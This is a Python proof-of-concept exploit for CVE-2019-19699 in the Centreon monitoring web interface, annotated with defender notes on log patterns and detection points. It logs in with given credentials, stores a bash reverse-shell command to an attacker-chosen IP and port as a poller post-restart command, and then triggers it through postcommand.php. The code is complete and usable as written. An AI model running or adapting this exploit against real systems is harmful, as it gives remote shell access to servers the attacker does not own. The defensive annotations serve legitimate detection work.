POC / CVE-2019-19699.py PY
import requests
import re
import sys
import urllib.parse
import _thread

# Proof-of-concept for CVE-2019-19699 against a Centreon web interface.
#
# The flow is authenticated: it logs in with the supplied USER/PASS, saves a
# command through the p=60803 form, edits poller id 1 through the p=60901
# form, and finally POSTs to the post-command endpoint.
#
# Defender notes (derived from the requests this script sends):
#   - Access logs show, in order, POSTs to /index.php,
#     /main.get.php?p=60803&type=3, /main.get.php?p=60901 and
#     /include/configuration/configGenerate/xml/postcommand.php.
#   - No User-Agent is set, so the requests library default is sent.
#   - The stored command is named "shell" and its command line contains a
#     bash /dev/tcp redirection; a saved command matching that pattern, or a
#     change to a poller's post-restart command list, is worth alerting on.
#   - The usage example logs in as admin/centreon, presumably installation
#     defaults (confirm); changing them and limiting who can reach the
#     configuration pages removes the precondition this script relies on.
#   - Apply the vendor fix referenced by the CVE-2019-19699 advisory.
if len(sys.argv) < 6:
    # Fewer than five positional arguments: print the banner and usage, then
    # exit with status 0.
    print("Script by TheCyberGeek")
    print("Discovered by SpengeSec & TheCyberGeek")
    print("Start Listener before starting this exploit!")
    print("")
    print("Usage:\tpython3 CVE-2019-19699.py URL USER PASS IP PORT")
    print("Ex:\tpython3 CVE-2019-19699.py http://10.0.0.2/centreon admin centreon 10.0.0.1 4444")
    sys.exit(0)
else:
    # All five values are taken from argv as strings and used without validation.
    base_path, username, password, ip, port = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5]
    print("Script by TheCyberGeek")
    print("Discovered by SpengeSec & TheCyberGeek")
    print("Start Listener before starting this exploit!")
    # One Session is reused so the login cookie carries across every request.
    s = requests.Session()
    f = s.get(base_path + "/index.php")
    # The login form embeds a centreon_token hidden field (anti-CSRF style
    # token); re.search(...).group(1) raises AttributeError if it is absent.
    token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
    f = s.post(base_path + "/index.php", data={"useralias": username, "password": password, "centreon_token": token, "submitLogin": "Connect"})
    # Login success is inferred from a marker string in the response body,
    # not from the HTTP status.
    if "You need to enable JavaScript to run this app" in f.text:
        print("Logged in!")
        # Step 1: open the command-creation form (p=60803, type=3) to obtain
        # a fresh form token.
        f = s.get(base_path + "/main.get.php?p=60803&o=a&type=3")
        token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
        if token:
            # Saves a command named "shell" whose command_line is a bash
            # reverse-connection string built by concatenating ip and port.
            # The server stores the line as submitted; this stored
            # command is the artefact defenders should look for in the
            # Centreon configuration and its change history.
            f = s.post(base_path + "/main.get.php?p=60803&type=3", data={"command_name": "shell", "command_type[command_type]": "3", "command_line": "bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1".format(ip,port), "resource": "$CENTREONPLUGINS$", "plugins": "/Centreon/SNMP", "macros": "$ADMINEMAIL$", "command_example": "", "listOfArg": "", "listOfMacros": "", "connectors": "", "graph_id": "", "command_activate[command_activate]": "1", "command_comment": "", "submitA": "Save", "command_id": "", "type": "3", "o": "a", "centreon_token": token})
            # Success is inferred from the command name appearing in the response.
            if "shell" in f.text:
                print("Great. Post-restart command has been saved!")
                # Step 2: the poller configuration page (p=60901) for
                # server_id=1 is requested.
                s.get(base_path + "/main.get.php?p=60901&o=c&server_id=1")
                token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
                if token:
                    # You may need to change pollercmd[0] to your sessions ID.
                    # The POST rewrites the whole configuration of poller
                    # id 1 ("Central") with hard-coded values and sets
                    # pollercmd[0]; an unexpected poller edit of this kind
                    # is a configuration-integrity signal.
                    f = s.post(base_path + "/main.get.php?p=60901", data={"name": "Central", "ns_ip_address": "127.0.0.1", "localhost[localhost]": "1", "is_default[is_default]": "1", "ssh_port": "22", "engine_start_command": "service centengine start", "engine_stop_command": "service centengine stop","engine_restart_command": "service centengine restart", "engine_reload_command": "service centengine reload", "nagios_bin": "/usr/sbin/centengine","nagiostats_bin": "/usr/sbin/centenginestats","nagios_perfdata": "/var/log/centreon-engine/service-perfdata", "broker_reload_command": "service cbd reload", "centreonbroker_cfg_path": "/etc/centreon-broker", "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker", "centreonbroker_logs_path": "", "centreonconnector_path": "/usr/lib64/centreon-connector", "init_script_centreontrapd": "centreontrapd", "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/", "pollercmd[0]":"188", "clone_order_pollercmd_0": "","ns_activate[ns_activate]": "1", "submitC": "Save", "id": "1", "o": "c", "centreon_token": token})
                    # Printed unconditionally; the response to the POST above
                    # is not checked.
                    print("Saved the post-restart command in poller configuration!")
                    # Step 3: the configuration export page (p=60902) for
                    # poller 1 is requested.
                    s.get(base_path + "/main.php?p=60902&poller=1")
                    token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
                    if token:
                        try:
                            # This message is printed before the request is
                            # sent, so it confirms nothing about the outcome.
                            print("[ + ] Shell received. Check your listener!")
                            # POST to postcommand.php for poller 1, presumably
                            # the endpoint that runs the poller's post-restart
                            # commands (confirm against Centreon source). The
                            # near-zero timeout means the client does not wait
                            # for a response. A request to this path followed
                            # by a shell process spawned under the web or
                            # Centreon service account is the key detection
                            # point.
                            f = s.post(base_path + """/include/configuration/configGenerate/xml/postcommand.php""", data={"poller": "1"}, timeout=0.0000000001)
                        except requests.exceptions.ReadTimeout:
                            # Expected with the timeout above; deliberately ignored.
                            pass
                    else:
                        print("Couldn't get token for poller export page...")
                else:
                    print("Could not find token for poller configuration page...")
            else:
                print("Failed to upload command...")
        else:
            print("Failed to grab token for command execution page...")
    else:
        print("Cannot login to Centreon...")